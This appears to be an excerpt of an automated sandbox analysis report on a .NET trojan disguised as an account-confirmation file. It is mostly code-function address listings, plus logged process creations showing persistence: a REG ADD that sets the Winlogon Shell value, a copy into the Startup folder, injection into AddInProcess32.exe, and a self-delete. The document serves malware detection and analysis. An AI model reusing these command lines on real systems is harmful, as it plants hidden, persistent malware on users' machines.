          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1D31830_2_02B1D318
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1D30830_2_02B1D308
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1F64030_2_02B1F640
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1BB8930_2_02B1BB89
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_02B1D80030_2_02B1D800
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B04B830_2_064B04B8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B555030_2_064B5550
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B537030_2_064B5370
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B3C1030_2_064B3C10
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B370130_2_064B3701
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B04A830_2_064B04A8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B554130_2_064B5541
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B453830_2_064B4538
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B12C830_2_064B12C8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B029030_2_064B0290
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B02A030_2_064B02A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B12B730_2_064B12B7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B536230_2_064B5362
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B531830_2_064B5318
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064BD32030_2_064BD320
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B004030_2_064B0040
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B000630_2_064B0006
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B3EA030_2_064B3EA0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B3C0130_2_064B3C01
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064BCCC830_2_064BCCC8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_064B4B8830_2_064B4B88
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_0BCC0A1130_2_0BCC0A11
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_0BCC0A2030_2_0BCC0A20
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 30_2_0BCC01A030_2_0BCC01A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_05631C8031_2_05631C80
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_05635E2031_2_05635E20
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0563394831_2_05633948
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_056325E831_2_056325E8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_056325F831_2_056325F8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0563040031_2_05630400
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_056366DA31_2_056366DA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0563669931_2_05636699
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_056303F031_2_056303F0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_05632D0831_2_05632D08
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_05632D1831_2_05632D18
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_05630C6A31_2_05630C6A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_05630C7031_2_05630C70
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_05630A2831_2_05630A28
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_05630A3831_2_05630A38
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0563762031_2_05637620
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_056310E031_2_056310E0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_056310D031_2_056310D0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_05635E1031_2_05635E10
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0563393731_2_05633937
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_05631BD831_2_05631BD8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068E877831_2_068E8778
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068E876831_2_068E8768
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068EB08331_2_068EB083
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068EB0BA31_2_068EB0BA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068EB0D631_2_068EB0D6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068E907B31_2_068E907B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068E711231_2_068E7112
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068E712031_2_068E7120
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068ECE8031_2_068ECE80
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068EAECF31_2_068EAECF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068EAE2B31_2_068EAE2B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068EAFF531_2_068EAFF5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068EAF0831_2_068EAF08
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068EAF6131_2_068EAF61
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068EDBE031_2_068EDBE0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_069304B831_2_069304B8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0693555031_2_06935550
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0693537031_2_06935370
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_06933C1031_2_06933C10
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_069336E531_2_069336E5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_069304A831_2_069304A8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0693554131_2_06935541
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0693029031_2_06930290
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_069312B731_2_069312B7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_069302A031_2_069302A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_069312C831_2_069312C8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0693D32031_2_0693D320
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0693536231_2_06935362
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0693000631_2_06930006
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0693004031_2_06930040
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_06933EA031_2_06933EA0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_0693CCC831_2_0693CCC8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_06933C0131_2_06933C01
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeCode function: 31_2_068E8240 CreateProcessAsUserW,31_2_068E8240
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess Stats: CPU usage > 98%
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000000.280195758.0000000000094000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIHMS Final.exe6 vs Hesab#U0131 Onaylay#U0131n.exe
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.359947027.0000000003414000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAssToMouthFull.dll$ vs Hesab#U0131 Onaylay#U0131n.exe
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000002.361036179.0000000005BA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAssToMouthFull.dll$ vs Hesab#U0131 Onaylay#U0131n.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,"
          Source: Hesab#U0131 Onaylay#U0131n.exeReversingLabs: Detection: 30%
          Source: Hesab#U0131 Onaylay#U0131n.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe "C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe"
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 13 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 13
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess created: C:\Users\user\AppData\Local\Temp\java.exe "C:\Users\user\AppData\Local\Temp\java.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,"
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\AppData\Local\Temp\java.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 13 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,Jump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeProcess created: C:\Users\user\AppData\Local\Temp\java.exe "C:\Users\user\AppData\Local\Temp\java.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 13 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\AppData\Local\Temp\java.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hesab#U0131 Onaylay#U0131n.exe.logJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winEXE@28/8@11/10
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4140:120:WilError_01
          Source: Hesab#U0131 Onaylay#U0131n.exe, 00000000.00000003.308654180.000000000B747000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Verdana is a trademark of the Microsoft group of companies.slnt
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Hesab#U0131 Onaylay#U0131n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Hesab#U0131 Onaylay#U0131n.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: java.exe, 0000000F.00000002.428056679.000000000D492000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417436505.000000000D492000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417244405.000000000D491000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000021.00000000.558563855.0000000000F02000.00000002.00000001.01000000.00000008.sdmp, AddInProcess32.exe, 00000022.00000000.559551250.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000021.00000002.654677430.00000000019DF000.00000040.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000021.00000002.653659262.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000022.00000002.653434243.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000022.00000003.570961490.0000000001420000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000022.00000002.654127914.00000000016DF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: AddInProcess32.exe, 00000022.00000002.657074804.00000000035E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, 00000021.00000002.654677430.00000000019DF000.00000040.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000021.00000002.653659262.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000022.00000002.653434243.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000022.00000003.570961490.0000000001420000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000022.00000002.654127914.00000000016DF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: AddInProcess32.exe, 00000021.00000002.657097783.00000000038E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: java.exe, 0000000F.00000002.428056679.000000000D492000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417436505.000000000D492000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000F.00000003.417244405.000000000D491000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000021.00000000.558563855.0000000000F02000.00000002.00000001.01000000.00000008.sdmp, AddInProcess32.exe, 00000022.00000000.559551250.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: cmd.pdb source: AddInProcess32.exe, 00000022.00000002.657074804.00000000035E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: AddInProcess32.exe, 00000021.00000002.657097783.00000000038E0000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: Hesab#U0131 Onaylay#U0131n.exe, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: 0.0.Hesab#U0131 Onaylay#U0131n.exe.10000.0.unpack, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: 0.2.Hesab#U0131 Onaylay#U0131n.exe.10000.0.unpack, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: 15.0.java.exe.a00000.2.unpack, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: 15.0.java.exe.a00000.1.unpack, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: 15.2.java.exe.a00000.0.unpack, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: 15.0.java.exe.a00000.3.unpack, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: 15.0.java.exe.a00000.0.unpack, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: java.exe.21.dr, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: 30.0.java.exe.880000.0.unpack, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: 30.2.java.exe.880000.0.unpack, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: 31.2.java.exe.d10000.0.unpack, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: 31.0.java.exe.d10000.0.unpack, Sa37/Wz57.cs.Net Code: NewLateBinding.LateCall(V_1[Rb7e], null, "Invoke", new object[] { null, new object[0] }, null, null, null, true)
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_0219BEBF push es; retf 0_2_0219BEC4
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BE64C8 push eax; ret 0_2_05BE64C9
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeCode function: 0_2_05BEB125 push dword ptr [edx+ebp*2-75h]; iretd 0_2_05BEB12F
